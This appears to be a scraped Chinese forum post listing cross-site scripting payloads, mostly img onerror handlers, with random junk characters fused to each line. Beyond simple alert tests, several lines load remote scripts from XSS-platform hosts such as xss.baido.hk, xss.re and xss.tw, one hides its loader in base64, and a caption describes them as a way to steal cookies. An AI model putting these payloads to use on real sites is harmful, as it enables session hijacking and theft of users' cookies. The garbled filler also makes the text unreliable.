<img src='non-exist.jpg'onerror="alert('xss')">8 b1 E. e7 j. C6 o2 o
<img src=# onerror=alert(123)>3 |# r$ H+ G: E, I: t2 g
<img src=# onerror=alert(document.cookie)>: L2 O$ B1 D/ H1 E! i2 t8 h
下面是利用平台钓cookie的* R7 c/ A: |3 g$ |7 a
<img src=x onerror=s=createElement("script");body.appendChild(s);s.src="http://xss.baido.hk/JnFrlW?1445149342";>
/ l) [. T1 p# ?! P0 I( r6 z3 W* F
/ B: R$ Q: g; X% V U* i/ F
<img src=x onerror=s=createElement('script');body.appendChild(s);s.src='你的js地址';>7 b$ Y/ M u; O% ^$ o
<img src=x onerror=with(document)body.appendChild(document.createElement(‘script‘)).src="//xss.re/974"></img>
. a. s. M& U, M2 o5 y+ F# n“><img src=x onerror=”with(document)body.appendChild(createElement(‘script’)).src=’//xss.re/974’”></img>$ G ^/ }2 E- g. o
<img src=1 onerror=jQuery.getScript("//xss.re/974")>
$ H) g; U8 a% j. ?0 Z/ r, V/ o+ m1 s<img src="#">' k: v1 F! M0 B% m5 D* o2 Z
<img src="#">/ P* F& W% V) }& U" U% ^' o
<img src=‘0‘ onerror=with(document)body.appendChild(createElement(‘script‘)).src=‘/xx‘>
. q; }# ?' D- f0 M<img src="http://fs3u.dajie.com/2013/01/05/146/13573533461773126m.jpg" border="0">& |( g! u# r* j9 [2 K! q
<img src=i onerror=eval(jQuery.getScript(‘//xss.tw/4091‘))>- {5 b0 J3 C% S: D
<img src=N onerror=eval(javascript:document.write(unescape(‘ <script src="http://xxx.js"></script>‘));)>
. o7 A* ]' Y* m! P7 ~: b<img src=x onerror=document.body.appendChild(document.createElement(‘script‘)).src=‘//xxx.xxx/a.js‘>( z( k; e |# i1 P1 { P
<img src=x width="0" height="0"></img>
# e/ S) l* E" N& y4 m9 P% `& n( K<img src=1 onerror=eval(atob('cz1jcmVhdGVFbGVtZW50KCdzY3JpcHQnKTtzLnNyYz0naHR0cHM6Ly94Lnh4ZS5sYS9WSic7Ym9keS5hcHBlbmRDaGlsZChzKQ=='))>9 f2 C; ]' R) M4 P L
<img src=x onerror=s=createElement('\x73cript');body.appendChild(s);s.src='http://xss.baido.hk/7OO7GQ?1510065652';>
6 T$ e0 m) m/ h0 d& p9 Z |